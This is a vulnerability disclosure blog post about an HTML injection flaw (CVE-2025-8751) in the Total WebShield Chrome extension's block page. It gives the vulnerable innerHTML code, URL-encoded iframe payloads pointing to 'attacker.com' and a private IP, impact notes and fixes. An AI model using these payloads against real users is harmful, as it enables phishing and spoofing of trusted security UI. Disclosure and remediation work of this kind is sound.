Self‑HTML Injection in Total WebShield (Chrome Extension v3.2)

FPT Metrodata IndonesiaFPT Metrodata Indonesia
3 min read

TL;DR: (This vulnerability was named CVE-2025-8751)
Total WebShield (v3.2) fails to sanitize the category URL‑parameter in its block page, allowing an attacker to inject arbitrary HTML into the extension’s UI. This can be abused to load remote content, phish users, or execute scripts in the context of the extension’s blocked‑page UI.

Steps to Reproduce:

  1. Install the extension and enable Total WebShield.

  2. Visit any URL classified as malicious (e.g. ?category=malware).

  3. Observe the block page with a reflected category label.

  4. Construct URL with category set to encoded HTML iframe:

     ?category=%3Ciframe%20src=%22http://attacker.com/test.html%22%20%20%3E%20%3C/iframe%3E%20malware&url=BLANK&backStepCount=2

  5. The injected iframe appears in the block page UI, rendering external content.

Introduction

Total WebShield, the URL‑blocking extension offered by TotalAV, displays a block page when it intercepts malicious or low‑trust websites. The category parameter in the block page URL reflects payloads directly into the HTML without any input sanitization or output encoding. This allows arbitrary HTML injection, including iframe embedding, leading to an attacker‑controlled page being rendered within the extension context.

After installation, when Total WebShield blocks a site (e.g. for malware, phishing), it redirects the browser to an internal HTML page:

chrome-extension://bobjajapamhdnbnimmaddcceeckkoiff/app/webshield/index.html?category=malware&url=http%3A%2F%2Fmaliciouswebsitetest.com%2F&backStepCount=2

Vulnerability Details

  1. Root Cause

    The extension reads the category parameter from location.search, and writes it directly into the page’s inner HTML without any escaping or sanitization.

  2. Injection Point

    In index.html (or its associated JavaScript), something like:

     const params = new URLSearchParams(window.location.search);
 const category = params.get('category') || 'unknown';
 document.querySelector('#category-label').innerHTML = category;

    Thus, any HTML in category is rendered unescaped.

  3. Proof of Concept (PoC)
    Visit a “blocked page” URL crafted as follows:

     chrome-extension://bobjajapamhdnbnimmaddcceeckkoiff/app/webshield/index.html?category=%3Ciframe%20src=%22http://192.168.58.192/test.html%22%20%20%3E%20%3C/iframe%3E%20malware&url=BLANK&backStepCount=2

    Alert from attacker‑hosted iframe confirming injection:

    • The block page displays the attacker’s iframe inline inside the extension.

    • This content is indistinguishable from legitimate UI content.

    • It does not trigger any alert or error in the browser.

  4. Impact

    This vulnerability opens the door to several types of abuse:

    • Phishing / social engineering: Display fake messages to trick users.

    • Clickjacking: Overlay misleading buttons or fake "Visit anyway" options.

    • Brand impersonation: Mimic official security messages or forms.

    • Potential escalation: While this is not a direct XSS vulnerability, combining it with other extension bugs could lead to code execution or privilege escalation.

Though <script> tags are not executed (due to CSP), arbitrary HTML tags like <iframe>, <img>, or even <style> are rendered as part of the DOM, which is enough for advanced manipulation or deception.

Recommendation

To fix this issue, the developers should:

  • Sanitize and escape all user-controlled input before inserting it into the DOM.

  • Replace .innerHTML assignments with .textContent where applicable.

  • Validate that the category parameter only contains expected values (e.g. "malware", "phishing", etc.).

  • Consider implementing a Content Security Policy (CSP) that restricts unsafe rendering behaviors.

Lessons Learned

Even browser extensions built for security can contain serious security bugs themselves. UI injection, even without JavaScript execution, can be dangerous in the right context.

Always validate and escape any untrusted data that touches the DOM, especially in extensions that run with high privileges and interact with the user directly.

0
Subscribe to my newsletter

Read articles from FPT Metrodata Indonesia directly inside your inbox. Subscribe to the newsletter, and don't miss out.

HTMLInjection TotalAV ClientSideVulnerability ExtensionSecurity cybersecuritybrowser security

Written by

FPT Metrodata Indonesia
FPT Metrodata Indonesia

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.